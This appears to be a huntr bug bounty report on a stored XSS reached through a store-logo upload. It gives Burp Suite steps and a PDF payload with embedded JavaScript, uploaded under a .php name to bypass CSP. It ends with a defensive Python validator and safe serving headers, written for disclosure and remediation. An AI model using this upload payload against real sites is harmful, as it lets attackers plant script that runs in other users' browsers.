File Upload lead to Stored XSS bypass csp

huntr report 9464E3C6-961D-4E23-8B3D-07CBB31DE541
2023-02-09 18:03:50
nayefhmoodh
www.huntr.dev

Tags: file upload, stored xss, bypass csp, burpsuite, image upload, payload, vulnerability, bug bounty

EPSS: 0.001 (percentile 25.5%)

Description

Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.

1. Log in to your application and create a Store called “Test”, leaving all other details at their defaults.
2. Navigate to the “Store Settings → General” tab.
3. Under the “Branding” section there is a “Choose File” control for selecting a logo for the store.
4. Select the “Choose File” option and pick any “.png” image.
5. Intercept the POST request issued by the “Choose File” upload using Burp Suite.
6. First delete the content of the uploaded PNG file, then change the extension from “.png” to “.php” (i.e. filename=“profile-picture.php”) and put the payload below in the file content.

Payload:

```
%PDF-1.3
%����
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>>
endobj
3 0 obj
<</AA
<</O
<</JS
(
try {
app.alert("bypass CSP XSS")
} catch (e) {
app.alert(e.message);
}
)
/S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>
endobj
4 0 obj
<</Length 21>>
stream

BT
/F1 24 Tf
ET

endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer

<</Root 1 0 R /Size 5>>
startxref
493
%%EOF
```

7. Send the request and open the uploaded file; the XSS executes.
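As an added defender-side example (not part of this report or the affected application), the server-side check that would have rejected this upload: validate the logo by file extension and magic bytes together, refuse PDF content outright, and serve stored uploads with headers that stop a viewer rendering them inline. Function and constant names are assumptions; the sample inputs are constructed.

```python
from dataclasses import dataclass

# Magic bytes for the image types a "store logo" field should accept.
IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": ("png", "image/png"),
    b"\xff\xd8\xff": ("jpg", "image/jpeg"),
    b"GIF87a": ("gif", "image/gif"),
    b"GIF89a": ("gif", "image/gif"),
}
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}


@dataclass
class UploadDecision:
    accepted: bool
    reason: str
    content_type: str = ""


def validate_logo_upload(filename: str, data: bytes) -> UploadDecision:
    """Accept only files whose extension AND magic bytes agree on an allowed image type."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS:
        return UploadDecision(False, f"extension '{ext}' not allowed")
    if data.lstrip().startswith(b"%PDF-"):
        # A PDF can carry OpenAction/AA JavaScript (as in this report); never accept it as a logo.
        return UploadDecision(False, "PDF content in image upload")
    for magic, (kind, mime) in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            expected = {"jpg", "jpeg"} if kind == "jpg" else {kind}
            if ext not in expected:
                return UploadDecision(False, f"extension '{ext}' does not match {kind} content")
            return UploadDecision(True, "ok", mime)
    return UploadDecision(False, "unrecognised or empty content")


def safe_download_headers(decision: UploadDecision, stored_name: str) -> dict:
    """Headers for serving a validated upload: fixed type, no sniffing, not rendered inline."""
    return {
        "Content-Type": decision.content_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{stored_name}"',
        "Content-Security-Policy": "sandbox",
    }


# Constructed samples: the report's upload shape (PDF bytes under a .php name),
# a PDF renamed to .png, and a minimal PNG header.
REPORT_STYLE_UPLOAD = ("profile-picture.php", b"%PDF-1.3\n1 0 obj\n<</Pages 2 0 R /Type /Catalog>>")
RENAMED_PDF = ("logo.png", b"%PDF-1.3\n%\xe2\xe3\xcf\xd3\n")
REAL_PNG = ("logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
```

Serving user uploads from a separate origin is the stronger fix; the headers above limit the damage when that is not yet possible.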
